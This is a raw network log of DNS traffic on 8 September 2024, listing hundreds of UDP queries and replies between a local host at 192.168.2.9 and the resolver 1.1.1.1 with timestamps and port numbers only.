                                                                                                                                                                                                          Sep 8, 2024 10:53:47.243731976 CEST53565251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.245776892 CEST6083953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.250930071 CEST53513721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.255635977 CEST53608391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.256970882 CEST53530601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.258322954 CEST6551653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261043072 CEST5534353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261143923 CEST53539571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261581898 CEST53495001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265279055 CEST53652711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265492916 CEST6245853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265659094 CEST5897853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.260329962 CEST53514871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.261908054 CEST53512371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.263720989 CEST53518731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.264163971 CEST6012453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.264988899 CEST53540421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.267172098 CEST53593481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.274950981 CEST5767153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.276391983 CEST5008353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.279320955 CEST53601241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.284730911 CEST53576711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.286231041 CEST53500831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.288326025 CEST53504731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.292284012 CEST6180953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298433065 CEST5006053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298607111 CEST6200753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.299047947 CEST6381253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.302927971 CEST53618091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.308568001 CEST53620071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.308756113 CEST53500601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.309231043 CEST53638121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310601950 CEST6430553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310657024 CEST6318553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310808897 CEST5031953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310931921 CEST6152453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.319593906 CEST53643051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.319884062 CEST53631851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.320131063 CEST53503191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.341064930 CEST53615241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359214067 CEST6449453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359349966 CEST5192553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359673023 CEST5063053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361310005 CEST6277253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361454010 CEST5870053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361732960 CEST6523653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361749887 CEST5058353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.369076014 CEST53506301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.369199038 CEST53644941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377437115 CEST53652361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377717018 CEST53505831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377912045 CEST53587001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.385482073 CEST53648941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.390306950 CEST53519251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.391546011 CEST53627721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.419847012 CEST53633341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458461046 CEST5291553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458724976 CEST5693353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458966970 CEST5602653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458990097 CEST5840853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459230900 CEST6027153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459539890 CEST5440153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459553003 CEST5972653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459834099 CEST5642053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459867954 CEST5601353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460258007 CEST5592553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460319996 CEST6057753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460566998 CEST6100153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.461606026 CEST6183553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.462905884 CEST4943953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463100910 CEST6130953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463288069 CEST6441553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.466025114 CEST5024353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.467562914 CEST53529151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.467974901 CEST53569331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.468781948 CEST53602711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469110012 CEST53544011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469134092 CEST53560261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469862938 CEST53605771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.470139980 CEST53597261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.470768929 CEST53559251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.471529007 CEST53560131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.472610950 CEST6336653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.472819090 CEST53494391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.473263025 CEST53613091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477140903 CEST53502431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477195024 CEST53584081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477209091 CEST53564201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477220058 CEST53618351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.478023052 CEST53610011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.479780912 CEST53644151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.483355999 CEST53633661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.890337944 CEST5445953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.891731977 CEST5283553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.892016888 CEST5852553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.899847984 CEST53544591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.902776957 CEST5246753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.906666994 CEST53585251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.908406973 CEST53528351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.912209034 CEST5511953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.912213087 CEST53524671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913156033 CEST5653453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913569927 CEST5322253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.920531988 CEST5075253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921243906 CEST5383853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921467066 CEST5049853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921596050 CEST53551191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921684027 CEST6117253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.922410011 CEST5513753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.923106909 CEST53532221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.924055099 CEST6441353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.925297976 CEST6091953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.926645041 CEST6423153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.928010941 CEST6354653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.928638935 CEST53565341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.930910110 CEST53507521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.931025028 CEST53611721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.931524992 CEST53538381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946399927 CEST53533051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946806908 CEST6336053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947531939 CEST5904053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947762012 CEST4935853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.949630022 CEST5382853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.951345921 CEST53558181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.951603889 CEST53535171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.952019930 CEST53580731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.952239990 CEST53501021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.952248096 CEST53569791.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.953684092 CEST53528381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.954443932 CEST53632401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.955890894 CEST53589701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.956005096 CEST53594181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.956641912 CEST4956553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957174063 CEST53493581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957263947 CEST6546753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957465887 CEST5682853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.958713055 CEST53613281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.959950924 CEST5336653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.960351944 CEST6455053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.960927010 CEST53546471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.961694002 CEST53523791.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.964426994 CEST53590401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965393066 CEST53538281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965394020 CEST6235853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965424061 CEST5194553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965960979 CEST6199453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.966178894 CEST53495651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.967312098 CEST53654671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.967750072 CEST53568281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.969356060 CEST53533661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.969660997 CEST53645501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.973248959 CEST53542991.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.981826067 CEST53619941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.982121944 CEST53519451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983294010 CEST6072553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983582973 CEST4956953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989006042 CEST5054853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989373922 CEST5295653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989928961 CEST5619253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.992818117 CEST53607251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.996241093 CEST53623581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.999094009 CEST53529561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.999371052 CEST53505481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.999470949 CEST53561921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.010085106 CEST5468153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.014280081 CEST6508053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.020176888 CEST53546811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.024022102 CEST53650801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.086993933 CEST53622141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.104306936 CEST53569411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.109502077 CEST53633601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.133919954 CEST6154153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.143013954 CEST53495691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.143289089 CEST53615411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230269909 CEST6222153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230793953 CEST5492353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234846115 CEST5261653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234952927 CEST5997153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.235065937 CEST5228853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.238687992 CEST6176253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.239515066 CEST5516153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.240012884 CEST6456553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.240267992 CEST6440853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.240402937 CEST53622211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.241122961 CEST53549231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.242898941 CEST5662153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.242928982 CEST5683253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.243818998 CEST6331053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.244529963 CEST53599711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.244755983 CEST53526161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.247777939 CEST53617621.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.249717951 CEST53566211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.249942064 CEST53645651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.251311064 CEST53522881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.253526926 CEST53568321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.255388975 CEST53644081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.258063078 CEST5259753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.258271933 CEST6362053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.259855986 CEST5970153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.260447025 CEST5030853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.263664007 CEST4944653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.265417099 CEST5742953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.266684055 CEST53597011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.267924070 CEST53525971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.271388054 CEST53636201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.272301912 CEST53551611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.272730112 CEST53494461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.275214911 CEST53633101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.291759014 CEST53503081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.296410084 CEST53574291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.815202951 CEST5583353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.817202091 CEST5511653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.825844049 CEST53558331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.828957081 CEST5434253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.829572916 CEST6021653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.834491968 CEST6459753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.835098982 CEST6208953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.839056015 CEST53602161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.843468904 CEST6305253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.844007969 CEST5909453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.845016003 CEST53645971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.852874041 CEST53630521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.859558105 CEST53543421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.859870911 CEST53590941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.212384939 CEST53532181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.214947939 CEST53633251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.217109919 CEST5081953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.217274904 CEST53549291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.217652082 CEST53511231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.218064070 CEST53571951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.218619108 CEST53517961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.220472097 CEST53637431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.220474005 CEST6297653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.220997095 CEST53542521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.221038103 CEST6223353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.221124887 CEST5068553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.222620964 CEST6138253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.223094940 CEST5368853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.223679066 CEST6070453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.224632978 CEST53623761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.224796057 CEST6043253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.226140976 CEST5539353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.226324081 CEST53508191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.229823112 CEST53629761.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.232582092 CEST53536881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.233017921 CEST53607041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.233714104 CEST53607011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.237005949 CEST53506851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.239439011 CEST5539653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.247390985 CEST6386353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.249484062 CEST6197853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.251156092 CEST5002553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.253498077 CEST53613821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.256145954 CEST53553931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.256928921 CEST53604321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.258016109 CEST53638631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.259572029 CEST53619781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.261326075 CEST53500251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.267373085 CEST5214153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.267607927 CEST5674153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268152952 CEST5544853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268299103 CEST5117853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268610954 CEST5506553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269953966 CEST5883853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.274550915 CEST53521411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.277486086 CEST53511781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.278065920 CEST53554481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.278806925 CEST53550651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282124043 CEST5408053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282500982 CEST6361453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282766104 CEST6435353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282933950 CEST6042553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285453081 CEST6186553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285623074 CEST6282853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287408113 CEST5264553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287739038 CEST5888953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.288081884 CEST6285953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289377928 CEST4977853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289573908 CEST6430353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289926052 CEST5421153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.291667938 CEST53643531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.291750908 CEST5357053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.292136908 CEST53636141.1.1.1192.168.2.9
